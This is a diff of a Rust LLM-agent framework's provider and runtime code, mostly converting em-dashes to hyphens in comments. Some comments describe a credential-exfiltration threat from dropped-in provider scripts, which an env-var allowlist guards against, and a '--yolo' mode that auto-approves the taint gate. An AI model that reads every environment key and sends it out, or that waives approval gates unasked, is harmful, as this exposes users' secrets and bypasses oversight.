         if model.starts_with("gpt-5.5") {
             ModelCapabilities {
                 supports_temperature: true,
@@ -88,7 +88,7 @@ impl OpenAIProvider {
                 max_context_tokens: 1_050_000,
                 max_output_tokens: 128_000,
             }
-        // GPT-5.x family (5.4, 5.4-mini, 5.4-nano, 5-mini) — 400K context, 128K output
+        // GPT-5.x family (5.4, 5.4-mini, 5.4-nano, 5-mini) - 400K context, 128K output
         } else if model.starts_with("gpt-5") {
             ModelCapabilities {
                 supports_temperature: true,
@@ -98,7 +98,7 @@ impl OpenAIProvider {
                 max_context_tokens: 400_000,
                 max_output_tokens: 128_000,
             }
-        // GPT-4.1 family — 1M context (must check before generic gpt-4)
+        // GPT-4.1 family - 1M context (must check before generic gpt-4)
         } else if model.starts_with("gpt-4.1") {
             ModelCapabilities {
                 supports_temperature: true,
@@ -108,7 +108,7 @@ impl OpenAIProvider {
                 max_context_tokens: 1_047_576,
                 max_output_tokens: 32_768,
             }
-        // o-series reasoning models (o3, o4) — no temperature, 200K context
+        // o-series reasoning models (o3, o4) - no temperature, 200K context
         } else if model.starts_with("o3") || model.starts_with("o4") {
             ModelCapabilities {
                 supports_temperature: false,
@@ -200,7 +200,7 @@ impl Provider for OpenAIProvider {
     }
 
     async fn count_tokens(&self, text: &str, model: &str) -> usize {
-        // tiktoken is exact for OpenAI models and runs locally — no network call.
+        // tiktoken is exact for OpenAI models and runs locally - no network call.
         crate::tokenizer::count_tokens(text, model)
     }
 

--- a/crates/leviath-providers/src/openai_compat.rs
+++ b/crates/leviath-providers/src/openai_compat.rs
@@ -206,7 +206,7 @@ pub fn build_openai_request_body(request: &InferenceRequest) -> serde_json::Valu
 }
 
 /// Merge a request's pass-through `extra` params (the manifest's
-/// `[model.parameters]` beyond temperature/max_output_tokens — `top_p`, `stop`,
+/// `[model.parameters]` beyond temperature/max_output_tokens - `top_p`, `stop`,
 /// `seed`, `frequency_penalty`, …) into an OpenAI-shaped request `target`.
 /// A non-object `extra` (e.g. `Null` when none are set) is a no-op, and keys the
 /// builder already set are not overwritten (explicit request fields win).
@@ -1054,7 +1054,7 @@ mod tests {
     #[tokio::test]
     async fn openai_sse_stream_ends_with_incomplete_buffer_returns_none() {
         use tokio_stream::StreamExt;
-        // No trailing "\n\n" — the event never completes.
+        // No trailing "\n\n" - the event never completes.
         let data = b"data: {\"choices\":[{\"delta\":{}}]}".to_vec();
         let stream = StaticByteStream {
             data: vec![data],
@@ -1086,7 +1086,7 @@ mod tests {
         // A comment-only SSE event (no `data:` line) glued directly to a real
         // data event in the SAME chunk. `parse_openai_sse_event` consumes the
         // comment event from the buffer but returns plain `None` (its
-        // for-loop finds no `data:` line to act on) -- indistinguishable to
+        // for-loop finds no `data:` line to act on) - indistinguishable to
         // the caller from "incomplete". So `poll_next`'s top-of-loop check
         // falls through and polls the inner stream again, which then reports
         // end-of-stream; only *there* does poll_next's own end-of-stream
@@ -1403,7 +1403,7 @@ mod tests {
         // building the debug header map skips any header whose name/value
         // won't parse (the `if let (Ok, Ok)` false arm) rather than panicking.
         // The request send itself fails (unroutable address, and reqwest also
-        // rejects the bad header), which is fine — the debug-http block runs
+        // rejects the bad header), which is fine - the debug-http block runs
         // first, before the send.
         let client = reqwest::Client::new();
         let body = serde_json::json!({ "model": "x" });

--- a/crates/leviath-providers/src/openrouter.rs
+++ b/crates/leviath-providers/src/openrouter.rs
@@ -105,7 +105,7 @@ impl OpenRouterProvider {
                         }],
                     }));
                 }
-                // Everything else — including tool_use/tool_result block history —
+                // Everything else - including tool_use/tool_result block history -
                 // goes through the OpenAI-format conversion so it round-trips on
                 // non-Anthropic models instead of being sent as raw block JSON.
                 _ => messages.extend(crate::openai_compat::message_to_openai(
@@ -268,7 +268,7 @@ impl Provider for OpenRouterProvider {
                 max_output_tokens: 65_536,
             };
         }
-        // ── Meta Llama 4 Scout — 10M context ─────────────────────────────────
+        // ── Meta Llama 4 Scout - 10M context ─────────────────────────────────
         if model.contains("llama-4-scout") {
             return ModelCapabilities {
                 supports_temperature: true,
@@ -279,7 +279,7 @@ impl Provider for OpenRouterProvider {
                 max_output_tokens: 32_768,
             };
         }
-        // ── Meta Llama 4 (Maverick + others) — 1M context ────────────────────
+        // ── Meta Llama 4 (Maverick + others) - 1M context ────────────────────
         if model.starts_with("meta-llama/llama-4") {
             return ModelCapabilities {
                 supports_temperature: true,
@@ -290,7 +290,7 @@ impl Provider for OpenRouterProvider {
                 max_output_tokens: 32_768,
             };
         }
-        // ── DeepSeek R1 — reasoning-only, no tools, no temperature ───────────
+        // ── DeepSeek R1 - reasoning-only, no tools, no temperature ───────────
         if model.contains("deepseek-r1") {
             return ModelCapabilities {
                 supports_temperature: false,
@@ -301,7 +301,7 @@ impl Provider for OpenRouterProvider {
                 max_output_tokens: 32_768,
             };
         }
-        // ── DeepSeek V4 Pro — 1M context, 384K output ────────────────────────
+        // ── DeepSeek V4 Pro - 1M context, 384K output ────────────────────────
         if model.contains("deepseek-v4-pro") {
             return ModelCapabilities {
                 supports_temperature: true,
@@ -345,7 +345,7 @@ impl Provider for OpenRouterProvider {
                 max_output_tokens: 32_768,
             };
         }
-        // ── Qwen 3.6+ / Qwen3 Coder — 1M context ────────────────────────────
+        // ── Qwen 3.6+ / Qwen3 Coder - 1M context ────────────────────────────
         if model.contains("qwen3.6") || model.contains("qwen3-coder") {
             return ModelCapabilities {
                 supports_temperature: true,
@@ -367,7 +367,7 @@ impl Provider for OpenRouterProvider {
                 max_output_tokens: 32_768,
             };
         }
-        // ── Anthropic models via OpenRouter — inherit direct-provider flags ───
+        // ── Anthropic models via OpenRouter - inherit direct-provider flags ───
         let anthropic_no_temp = model.contains("claude-opus-4-8")
             || model.contains("claude-opus-4-7")
             || model.contains("claude-fable-5")
@@ -382,7 +382,7 @@ impl Provider for OpenRouterProvider {
                 max_output_tokens: 128_000,
             };
         }
-        // ── OpenAI o-series via OpenRouter — no temperature ───────────────────
+        // ── OpenAI o-series via OpenRouter - no temperature ───────────────────
         if model.starts_with("openai/o") {
             return ModelCapabilities {
                 supports_temperature: false,
@@ -650,7 +650,7 @@ mod tests {
         let provider = OpenRouterProvider::new("key".to_string());
         // Unknown model ⇒ the conservative fallback.
         assert_eq!(provider.max_context_tokens("any-model"), 128_000);
-        // A known large-context model reports its real size (not a flat 128K) —
+        // A known large-context model reports its real size (not a flat 128K) -
         // it now delegates to the per-model capabilities table.
         assert_eq!(
             provider.max_context_tokens("meta-llama/llama-4-scout"),

--- a/crates/leviath-providers/src/openrouter.rs
+++ b/crates/leviath-providers/src/openrouter.rs
@@ -84,7 +84,7 @@ impl OpenRouterProvider {
         let mut breakpoint_count = 0usize;
 
         let mut messages: Vec<serde_json::Value> = Vec::new();
-        // System blocks first (previously dropped).
+        // System blocks go first; dropping them silently loses the system prompt.
         for block in &request.system {
             messages.push(serde_json::json!({ "role": "system", "content": block.text }));
         }

--- a/crates/leviath-providers/src/provider.rs
+++ b/crates/leviath-providers/src/provider.rs
@@ -38,18 +38,18 @@ pub enum ProviderError {
 }
 
 impl ProviderError {
-    /// Whether this failure is worth retrying — a transient network or
-    /// server-side issue (connection reset, timeout, 429, 5xx / "overloaded")
-    /// — as opposed to a permanent one (auth, invalid request, token limit)
+    /// Whether this failure is worth retrying - a transient network or
+    /// server-side issue (connection reset, timeout, 429, 5xx / "overloaded") -
+    /// as opposed to a permanent one (auth, invalid request, token limit)
     /// that would just fail again.
     pub fn is_transient(&self) -> bool {
         match self {
             // Network-level failures: connection reset, timeout, DNS, TLS.
             ProviderError::RequestFailed(_) => true,
-            // 429 — back off and retry.
+            // 429 - back off and retry.
             ProviderError::RateLimitExceeded => true,
             // We only have the message, so match the common server-side (5xx)
-            // signals — including Anthropic's 529 "overloaded". 4xx client
+            // signals - including Anthropic's 529 "overloaded". 4xx client
             // errors carry none of these and stay permanent.
             ProviderError::ApiError(msg) => {
                 let m = msg.to_ascii_lowercase();
@@ -250,10 +250,10 @@ pub struct Message {
     /// Role (system, user, assistant)
     pub role: String,
 
-    /// Message content — plain text or structured content blocks.
+    /// Message content - plain text or structured content blocks.
     pub content: MessageContent,
 
-    /// If true, this message is a cache breakpoint -- the provider should
+    /// If true, this message is a cache breakpoint - the provider should
     /// mark everything up to and including this message as cacheable.
     #[serde(default, skip_serializing_if = "std::ops::Not::not")]
     pub cache_breakpoint: bool,
@@ -414,9 +414,9 @@ pub struct RateLimitConfig {
 /// [`apply_request_timeout`]), the claude-code provider as its subprocess
 /// timeout, and the dispatch layer as the `RetryPolicy.job_timeout` backstop
 /// that frees the pool slot even if a provider's own timer is defeated (e.g. by
-/// trickle keep-alive). 15 minutes is generous for any real inference —
+/// trickle keep-alive). 15 minutes is generous for any real inference -
 /// including large-prompt Anthropic cache creation, which can take several
-/// minutes to first byte — while still guaranteeing a hung call cannot run
+/// minutes to first byte - while still guaranteeing a hung call cannot run
 /// forever. A per-stage `[stages.<name>.model] request_timeout_secs` overrides
 /// it, so a slow stage can wait longer and a fast one can fail sooner.
 pub const DEFAULT_INFERENCE_TIMEOUT_SECS: u64 = 900;
@@ -425,7 +425,7 @@ pub const DEFAULT_INFERENCE_TIMEOUT_SECS: u64 = 900;
 ///
 /// When `request_timeout_secs` is `Some`, sets a hard per-request total timeout
 /// (reqwest's `RequestBuilder::timeout`) so the call is aborted after that many
-/// seconds regardless of connection state — this is what makes a per-stage
+/// seconds regardless of connection state - this is what makes a per-stage
 /// timeout *longer* than any global default actually take effect, and a shorter
 /// one fail fast. When `None`, no per-request cap is added and the call is bound
 /// only by the client-level timeout (if any) and the dispatch `job_timeout`
@@ -443,13 +443,13 @@ pub fn apply_request_timeout(
 /// Build a `reqwest::Client` for talking to an LLM HTTP API.
 ///
 /// All providers should use this instead of `Client::new()`. It applies:
-/// - **`pool_max_idle_per_host(0)`** — never reuse an idle connection. A large
+/// - **`pool_max_idle_per_host(0)`** - never reuse an idle connection. A large
 ///   request sent over a *reused* pooled connection to `api.anthropic.com`
 ///   stalls indefinitely (the server never responds), 100% reproducibly on some
 ///   setups, while the *same* large request over a *fresh* connection succeeds
 ///   (confirmed via `curl`: a 40KB POST on a fresh connection returns HTTP 200,
 ///   and small requests, which don't trigger the stall, share the pool fine).
-///   It is transport-independent — it reproduces over both HTTP/2 and HTTP/1.1 —
+///   It is transport-independent - it reproduces over both HTTP/2 and HTTP/1.1 -
 ///   so forcing a fresh connection per request, not the protocol, is the fix.
 ///   The cost is a TLS handshake per request, negligible for the sequential
 ///   request/response calls these providers make. **This** is the real fix for
@@ -1138,7 +1138,7 @@ mod tests {
 
     /// Regression for the read_files hang: a connection where the server
     /// accepts the request but never sends a response must ERROR, not block
-    /// forever. This is the exact shape of the hang the user hit — a large
+    /// forever. This is the exact shape of the hang the user hit - a large
     /// request accepted by Anthropic (h2 WindowUpdate seen) with no response
     /// ever returned. The bound is now the per-request timeout applied by
     /// [`apply_request_timeout`] (on top of the fresh-connection fix), so this

--- a/crates/leviath-providers/src/rate_limit.rs
+++ b/crates/leviath-providers/src/rate_limit.rs
@@ -389,7 +389,7 @@ mod tests {
     #[tokio::test]
     async fn acquire_prunes_expired_token_count_entries() {
         // acquire()'s pruning loop also prunes `token_counts` (shared state
-        // with check_tpm()'s own, separate pruning loop) -- no other test
+        // with check_tpm()'s own, separate pruning loop) - no other test
         // seeds an expired token_counts entry before calling acquire()
         // itself, so that pop_front() call is otherwise unexercised from this
         // function.

--- a/crates/leviath-providers/src/rhai_provider/convert_tests.rs
+++ b/crates/leviath-providers/src/rhai_provider/convert_tests.rs
@@ -174,7 +174,7 @@ fn runtime_error_builds_runtime_variant() {
 #[test]
 fn parse_inference_and_chunk_reject_unconvertible_dynamic() {
     // A function pointer has no serde_json representation, so `from_dynamic`
-    // fails — exercising the InvalidResponse error arms.
+    // fails - exercising the InvalidResponse error arms.
     let fp = Dynamic::from(rhai::FnPtr::new("noop").unwrap());
     assert!(matches!(
         parse_inference_dynamic(fp.clone()).unwrap_err(),

--- a/crates/leviath-providers/src/rhai_provider/engine.rs
+++ b/crates/leviath-providers/src/rhai_provider/engine.rs
@@ -25,8 +25,8 @@ const MAX_OPERATIONS: u64 = 500_000;
 /// environment variables this script may read. Provider scripts are the most
 /// privileged script surface Leviath has - they run during inference, not
 /// through a tool call, so nothing about them passes an approval prompt - and
-/// `env_var` was previously unrestricted here with no permission layer of any
-/// kind. Anything that could write one file into `~/.leviath/providers/` could
+/// this allowlist is the only permission layer `env_var` has here. Without
+/// it, anything that could write one file into `~/.leviath/providers/` could
 /// read every key in the process and post it out on the next inference.
 pub fn build_init_engine(env_allowlist: Arc<Vec<String>>) -> Engine {
     let mut engine = Engine::new();

--- a/crates/leviath-providers/src/rhai_provider/engine.rs
+++ b/crates/leviath-providers/src/rhai_provider/engine.rs
@@ -13,7 +13,7 @@ use crate::provider::StreamChunk;
 use super::convert::{chunk_from_dynamic, host_err_to_rhai, runtime_error};
 use super::host::{BrokerJob, HostRequest, HttpJob, HttpMethod, StreamHttpJob};
 
-/// Max Rhai operations per script call — the only wall-clock bound on a pure
+/// Max Rhai operations per script call - the only wall-clock bound on a pure
 /// (non-I/O) runaway loop; HTTP is bounded separately by the request timeout.
 const MAX_OPERATIONS: u64 = 500_000;
 
@@ -23,8 +23,8 @@ const MAX_OPERATIONS: u64 = 500_000;
 ///
 /// `env_allowlist` is `[security] allow_env_vars`: the credential-shaped
 /// environment variables this script may read. Provider scripts are the most
-/// privileged script surface Leviath has — they run during inference, not
-/// through a tool call, so nothing about them passes an approval prompt — and
+/// privileged script surface Leviath has - they run during inference, not
+/// through a tool call, so nothing about them passes an approval prompt - and
 /// `env_var` was previously unrestricted here with no permission layer of any
 /// kind. Anything that could write one file into `~/.leviath/providers/` could
 /// read every key in the process and post it out on the next inference.
@@ -48,7 +48,7 @@ pub struct ExecConfig {
     pub timeout_secs: Option<u64>,
     /// When streaming, the sink `__emit_chunk` feeds parsed chunks into.
     pub chunk_tx: Option<mpsc::UnboundedSender<crate::Result<StreamChunk>>>,
-    /// `[security] allow_env_vars` — see [`build_init_engine`].
+    /// `[security] allow_env_vars` - see [`build_init_engine`].
     pub env_allowlist: Arc<Vec<String>>,
 }
 

--- a/crates/leviath-providers/src/rhai_provider/engine_tests.rs
+++ b/crates/leviath-providers/src/rhai_provider/engine_tests.rs
@@ -4,7 +4,7 @@ use super::*;
 use std::sync::Arc;
 use tokio::sync::mpsc;
 
-/// No credential-shaped variable is allowlisted — the default posture, and the
+/// No credential-shaped variable is allowlisted - the default posture, and the
 /// one these tests should be checking against.
 fn no_env_allowlist() -> Arc<Vec<String>> {
     Arc::new(Vec::new())
@@ -85,7 +85,7 @@ fn env_var_present_and_absent() {
 
 /// A provider script runs during inference, not through a tool call, so nothing
 /// it does passes an approval prompt. An unallowlisted credential name therefore
-/// reads as unset — scripts already handle "my key isn't in the environment" by
+/// reads as unset - scripts already handle "my key isn't in the environment" by
 /// falling back to their `initialize` config, so this puts them on that path
 /// rather than failing the whole inference.
 #[test]

--- a/crates/leviath-providers/src/rhai_provider/host.rs
+++ b/crates/leviath-providers/src/rhai_provider/host.rs
@@ -5,7 +5,7 @@
 //! [`StreamHttpJob`] over a channel to an async **broker** that performs the
 //! real request through an [`HttpExecutor`]. Production uses [`ReqwestExecutor`];
 //! tests inject a fake so no socket is ever bound. Rate limiting lives in the
-//! provider (around the executor), not here — the executor is pure transport.
+//! provider (around the executor), not here - the executor is pure transport.
 
 use std::collections::BTreeMap;
 

--- a/crates/leviath-providers/src/rhai_provider/meta.rs
+++ b/crates/leviath-providers/src/rhai_provider/meta.rs
@@ -4,7 +4,7 @@
 ///
 /// All fields are optional and carry sensible defaults, so a script with no
 /// annotations still loads. Recognized directives:
-/// - `// @provider <name>` — informational name the script claims (activation is
+/// - `// @provider <name>` - informational name the script claims (activation is
 ///   by registry name, i.e. the config key / filename, not this).
 /// - `// @description <text>`
 /// - `// @default_model <id>`

--- a/crates/leviath-providers/src/rhai_provider/mod.rs
+++ b/crates/leviath-providers/src/rhai_provider/mod.rs
@@ -1,4 +1,4 @@
-//! Drop-in LLM providers defined by a Rhai script (issue #101).
+//! Drop-in LLM providers defined by a Rhai script.
 //!
 //! A `.rhai` script in `~/.leviath/providers/` implements the API-specific
 //! *format mapping* (request → HTTP body, response JSON → Leviath types); this

--- a/crates/leviath-providers/src/rhai_provider/mod.rs
+++ b/crates/leviath-providers/src/rhai_provider/mod.rs
@@ -3,7 +3,7 @@
 //! A `.rhai` script in `~/.leviath/providers/` implements the API-specific
 //! *format mapping* (request → HTTP body, response JSON → Leviath types); this
 //! Rust [`RhaiProvider`] wraps it with the full [`Provider`]
-//! trait and owns the hard runtime concerns — HTTP transport, rate limiting,
+//! trait and owns the hard runtime concerns - HTTP transport, rate limiting,
 //! per-stage timeouts, retry/error-classification, and token counting.
 //!
 //! ## Async ↔ sync bridge
@@ -17,7 +17,7 @@
 //!
 //! ## Script contract
 //!
-//! Required: `initialize(config) -> Map` (runs **offline** — no network host
+//! Required: `initialize(config) -> Map` (runs **offline** - no network host
 //! functions are registered for it) and `inference(state, request) -> Map`.
 //! Optional: `stream(state, request, on_chunk)`, `count_tokens(state, text,
 //! model) -> int`, `list_models(state) -> Array`.

--- a/crates/leviath-providers/src/rhai_provider/tests.rs
+++ b/crates/leviath-providers/src/rhai_provider/tests.rs
@@ -1,11 +1,11 @@
 //! Integration tests for [`RhaiProvider`] driven by a fake [`HttpExecutor`] so
-//! no socket is ever bound. Runs on the default current-thread tokio runtime —
+//! no socket is ever bound. Runs on the default current-thread tokio runtime -
 //! the exact flavor the channel broker must survive.
 
 use std::collections::{HashMap, VecDeque};
 use std::sync::{Arc, Mutex};
 
-/// No credential-shaped variable is allowlisted — the default posture.
+/// No credential-shaped variable is allowlisted - the default posture.
 fn no_env_allowlist() -> Arc<Vec<String>> {
     Arc::new(Vec::new())
 }
@@ -253,7 +253,7 @@ async fn infer_single_http_post() {
 
 #[tokio::test]
 async fn infer_uses_two_arg_http_overloads() {
-    // http_get(url, headers) and http_post(url, body) — the shorter overloads.
+    // http_get(url, headers) and http_post(url, body) - the shorter overloads.
     let src = format!(
         "{NOOP_INIT}fn inference(state, request) {{ \
          let a = parse_json(http_get(\"http://a\", #{{ \"H\": \"v\" }})); \

--- a/crates/leviath-providers/src/text_tools.rs
+++ b/crates/leviath-providers/src/text_tools.rs
@@ -12,7 +12,7 @@
 //! fence is used to re-render prior assistant turns, so the transcript the model
 //! reads is written in exactly the format it is asked to produce.
 //!
-//! Everything here is pure — no I/O, no clock, no interior mutability — so the
+//! Everything here is pure - no I/O, no clock, no interior mutability - so the
 //! protocol can be exercised without spawning anything. Tool-call *identity* is
 //! deliberately left to the caller: [`parse_tool_calls`] returns
 //! `(name, arguments)` pairs and the provider assigns ids, which keeps id
@@ -34,7 +34,7 @@ const FENCE_CLOSE: &str = "```";
 /// The last line is load-bearing and not boilerplate. The Claude Code CLI
 /// injects its own preamble below the layer any flag reaches, and with its
 /// built-in tools disabled that preamble reliably talks the model out of calling
-/// anything — observed twice in testing, where it answered "the read_file tool is
+/// anything - observed twice in testing, where it answered "the read_file tool is
 /// not available in my current environment" instead of emitting a call.
 /// Explicitly overriding that framing fixed it on the first attempt.
 pub const PROTOCOL_INSTRUCTIONS: &str = "\
@@ -47,7 +47,7 @@ containing a JSON array of calls:
 
 Emit the block whenever you need a tool; you may request several calls at once by
 putting more than one object in the array. The runtime executes them and returns
-the results to you on the next turn — you never see them inline. Put any prose
+the results to you on the next turn - you never see them inline. Put any prose
 outside the block.
 
 You cannot act except through these tools. Any claim that the tools above are
@@ -73,7 +73,7 @@ pub fn render_tool_catalog(tools: &[Tool]) -> String {
 
 /// The full block appended to the system prompt: catalog plus protocol.
 ///
-/// Empty when `tools` is empty — a stage with no tools gets no tool-calling
+/// Empty when `tools` is empty - a stage with no tools gets no tool-calling
 /// instructions and no wasted tokens.
 pub fn render_system_suffix(tools: &[Tool]) -> String {
     if tools.is_empty() {
@@ -89,7 +89,7 @@ pub fn render_system_suffix(tools: &[Tool]) -> String {
 ///
 /// Malformed input degrades rather than failing the turn: a fence whose body
 /// isn't a JSON array of call objects contributes no calls, and an entry missing
-/// a `name` is skipped. An *unterminated* fence is left in the prose untouched —
+/// a `name` is skipped. An *unterminated* fence is left in the prose untouched -
 /// a truncated reply shouldn't have its visible text silently eaten. An `id`
 /// emitted by the model is ignored; ids are the runtime's to allocate.
 #[expect(
@@ -111,7 +111,7 @@ pub fn parse_tool_calls(text: &str) -> (String, Vec<(String, serde_json::Value)>
         };
         let body_start = open + FENCE_OPEN.len() + nl + 1;
         let Some(close_rel) = rest[body_start..].find(FENCE_CLOSE) else {
-            break; // unterminated — leave the remainder as prose
+            break; // unterminated - leave the remainder as prose
         };
         let body = &rest[body_start..body_start + close_rel];
 

--- a/crates/leviath-providers/src/tokenizer.rs
+++ b/crates/leviath-providers/src/tokenizer.rs
@@ -32,7 +32,7 @@ pub fn count_tokens(text: &str, model: &str) -> usize {
 ///
 /// Both halves return `&'static CoreBPE` from tiktoken-rs's cached singletons,
 /// so an unknown model falls back to `cl100k_base` without building a second
-/// encoder — and without the `.expect()` the old fallible `cl100k_base()`
+/// encoder - and without the `.expect()` the old fallible `cl100k_base()`
 /// required, since the singleton accessor cannot fail.
 fn count_tokens_tiktoken(text: &str, model: &str) -> usize {
     let bpe = bpe_for_model(model).unwrap_or_else(|_| tiktoken_rs::cl100k_base_singleton());
@@ -133,8 +133,8 @@ mod tests {
 
     #[test]
     fn an_unrecognized_gpt_model_falls_back_to_cl100k() {
-        // tiktoken-rs resolves plausible future names by prefix — `gpt-5.5`
-        // returns `Ok` — so the fallback needs a name its table genuinely has
+        // tiktoken-rs resolves plausible future names by prefix - `gpt-5.5`
+        // returns `Ok` - so the fallback needs a name its table genuinely has
         // no entry for. Without this, the `unwrap_or_else` arm is never taken
         // and an unknown model would panic in production before anyone noticed.
         assert!(tiktoken_rs::bpe_for_model("gpt-zzz").is_err());

--- a/crates/leviath-providers/src/tokenizer.rs
+++ b/crates/leviath-providers/src/tokenizer.rs
@@ -32,8 +32,8 @@ pub fn count_tokens(text: &str, model: &str) -> usize {
 ///
 /// Both halves return `&'static CoreBPE` from tiktoken-rs's cached singletons,
 /// so an unknown model falls back to `cl100k_base` without building a second
-/// encoder - and without the `.expect()` the old fallible `cl100k_base()`
-/// required, since the singleton accessor cannot fail.
+/// encoder - and the singleton accessor cannot fail, so no `.expect()` is
+/// needed on the fallback path.
 fn count_tokens_tiktoken(text: &str, model: &str) -> usize {
     let bpe = bpe_for_model(model).unwrap_or_else(|_| tiktoken_rs::cl100k_base_singleton());
     bpe.encode_with_special_tokens(text).len()

--- a/crates/leviath-runtime/Cargo.toml
+++ b/crates/leviath-runtime/Cargo.toml
@@ -10,7 +10,7 @@ authors.workspace = true
 # crates. Saying so explicitly prevents an accidental `cargo publish` and lets
 # cargo-deny treat the intra-workspace `path` dependencies as what they are
 # rather than as unbounded version requirements. Remove this line if a crate is
-# ever meant to be published — at which point its path deps need versions too.
+# ever meant to be published - at which point its path deps need versions too.
 publish = false
 
 [dependencies]

--- a/crates/leviath-runtime/src/cancel.rs
+++ b/crates/leviath-runtime/src/cancel.rs
@@ -1,7 +1,7 @@
 //! A one-shot "stop what you're doing" signal for work already in flight.
 //!
 //! Cancelling an agent sets its status, which stops the dispatch systems from
-//! starting *new* work — but an inference request or tool batch handed to the
+//! starting *new* work - but an inference request or tool batch handed to the
 //! async lanes before that keeps running to completion. For a stalled provider
 //! call that is up to the job timeout; for a tool batch there was no bound at
 //! all, and the batch holds one of the tool lane's fixed number of workers the
@@ -27,7 +27,7 @@ struct Inner {
 }
 
 /// A cloneable cancellation signal. Every clone observes the same state, and
-/// cancelling is idempotent — a token that fires twice (say, a cancel racing a
+/// cancelling is idempotent - a token that fires twice (say, a cancel racing a
 /// reap) is not an error.
 #[derive(Clone, Default)]
 pub struct CancelToken {
@@ -55,7 +55,7 @@ impl CancelToken {
     ///
     /// The waiter is armed *before* the flag is re-checked. `notify_waiters`
     /// only wakes waiters registered at the time it runs, so checking first and
-    /// waiting second would lose a cancel that landed in between — and the job
+    /// waiting second would lose a cancel that landed in between - and the job
     /// would then run to completion despite having been cancelled.
     pub async fn cancelled(&self) {
         let notified = self.inner.notify.notified();

--- a/crates/leviath-runtime/src/compaction_bridge.rs
+++ b/crates/leviath-runtime/src/compaction_bridge.rs
@@ -1,4 +1,4 @@
-//! The async worker side of the ECS compaction stage — the sync-ECS ↔ async-I/O
+//! The async worker side of the ECS compaction stage - the sync-ECS ↔ async-I/O
 //! bridge for LLM context compaction.
 //!
 //! When an agent's context crosses the eviction threshold and a region needs
@@ -46,7 +46,7 @@ pub struct CompactionOutcome {
 
 /// Run one compaction job: summarize each region sequentially with the permit
 /// held, release the slot, report the outcome, and wake the tick loop. Stops at
-/// the first error (best-effort — the collect system leaves the context as-is).
+/// the first error (best-effort - the collect system leaves the context as-is).
 pub async fn run_compaction_job(
     job: CompactionJob,
     results: UnboundedSender<CompactionOutcome>,

--- a/crates/leviath-runtime/src/components.rs
+++ b/crates/leviath-runtime/src/components.rs
@@ -89,8 +89,8 @@ pub struct GateAutoApprove;
 ///
 /// A stage-boundary checkpoint (`plan_approval` and friends) blocks on the
 /// interaction hub exactly like a tool approval does, so an unattended run
-/// would park at the first one forever - the same dead end issue #107 is about,
-/// reached a different way. When present,
+/// would park at the first one forever - the same dead end a blocking tool
+/// approval poses for a headless run, reached a different way. When present,
 /// [`dispatch_interaction_point`](crate::interaction_points::dispatch_interaction_point)
 /// still publishes the document to its region (so the decision is inspectable
 /// afterwards) but resolves the point as approved.

--- a/crates/leviath-runtime/src/components.rs
+++ b/crates/leviath-runtime/src/components.rs
@@ -73,13 +73,13 @@ pub struct AwaitingInteraction;
 ///
 /// Set when an agent is launched with `--yolo` (approve everything, run
 /// unattended). The taint gate raises a `MultipleChoice` interaction that the
-/// tool-policy `--yolo` wildcard does not cover, so without this a headless run
-/// — e.g. one driven over the Agent Client Protocol, where no human can answer —
+/// tool-policy `--yolo` wildcard does not cover, so without this a headless run -
+/// e.g. one driven over the Agent Client Protocol, where no human can answer -
 /// would block forever on a gate no one resolves. When present,
 /// [`dispatch_tools`](crate::pipeline::dispatch_tools) still evaluates the gate
 /// (so an over-cleared call is recorded in the audit trail as
 /// [`YoloAutoApprove`](leviath_core::taint::GateDecisionSource::YoloAutoApprove))
-/// but auto-approves the call instead of raising a prompt — enforcement is
+/// but auto-approves the call instead of raising a prompt - enforcement is
 /// waived, accountability is kept.
 #[derive(Component, Debug, Clone, Copy, Default)]
 pub struct GateAutoApprove;
@@ -89,7 +89,7 @@ pub struct GateAutoApprove;
 ///
 /// A stage-boundary checkpoint (`plan_approval` and friends) blocks on the
 /// interaction hub exactly like a tool approval does, so an unattended run
-/// would park at the first one forever — the same dead end issue #107 is about,
+/// would park at the first one forever - the same dead end issue #107 is about,
 /// reached a different way. When present,
 /// [`dispatch_interaction_point`](crate::interaction_points::dispatch_interaction_point)
 /// still publishes the document to its region (so the decision is inspectable
@@ -186,10 +186,10 @@ pub struct AssembledContext {
 fn cache_hint_sort_priority(hint: leviath_core::CacheHint) -> u8 {
     use leviath_core::CacheHint;
     match hint {
-        CacheHint::Always => 0,               // Pinned, CompactHistory — most stable
+        CacheHint::Always => 0,               // Pinned, CompactHistory - most stable
         CacheHint::SlidingPrefix { .. } => 1, // Partially stable
-        CacheHint::UntilChanged => 2,         // Compacting — changes on compaction
-        CacheHint::Never => 3,                // Temporary, Clearable — changes every iteration
+        CacheHint::UntilChanged => 2,         // Compacting - changes on compaction
+        CacheHint::Never => 3,                // Temporary, Clearable - changes every iteration
     }
 }
 
@@ -514,7 +514,7 @@ impl ContextWindow {
                                 is_error,
                                 ..
                             } => {
-                                // Accumulate — will be flushed on next non-ToolResult or end
+                                // Accumulate - will be flushed on next non-ToolResult or end
                                 pending_tool_results.push(
                                     leviath_providers::ContentBlock::ToolResult {
                                         tool_use_id: tool_call_id.clone(),
@@ -682,7 +682,7 @@ impl ContextWindow {
                             .collect();
 
                         if filtered.is_empty() {
-                            // No content left — drop this message entirely
+                            // No content left - drop this message entirely
                             None
                         } else {
                             Some(leviath_providers::Message {
@@ -714,7 +714,7 @@ impl ContextWindow {
             let bp_idx = messages.len() - 4;
             messages[bp_idx].cache_breakpoint = true;
         } else if messages.len() >= 2 {
-            // Small conversation — cache at least the first message
+            // Small conversation - cache at least the first message
             messages[0].cache_breakpoint = true;
         }
 
@@ -731,7 +731,7 @@ impl ContextWindow {
         // request that ends on an assistant turn as an (unsupported) prefill
         // ("This model does not support assistant message prefill"). After a
         // stage transition that carries the conversation, the last message is
-        // the previous stage's final assistant turn — hand the turn back to the
+        // the previous stage's final assistant turn - hand the turn back to the
         // model with a minimal nudge so it acts on the new stage's instructions.
         if messages.last().map(|m| m.role.as_str()) == Some("assistant") {
             messages.push(leviath_providers::Message {
@@ -1158,7 +1158,7 @@ mod tests {
 
         assert_eq!(window.current_tokens, 600);
 
-        // Request 500 free tokens — only 400 free, can't free clearable/temporary, so compacting should be identified
+        // Request 500 free tokens - only 400 free, can't free clearable/temporary, so compacting should be identified
         let result = window.try_evict(500).unwrap();
         assert_eq!(result.tokens_freed, 0);
         assert_eq!(result.needs_compaction, vec!["impl".to_string()]);
@@ -1188,7 +1188,7 @@ mod tests {
 
     #[test]
     fn test_try_evict_errors_when_pinned_regions_exceed_budget() {
-        // Pinned/CompactHistory regions are never evicted — if their combined
+        // Pinned/CompactHistory regions are never evicted - if their combined
         // token usage alone exceeds max_tokens, try_evict must report this as
         // a configuration error instead of silently doing nothing useful.
         let mut window = ContextWindow::new(1000);
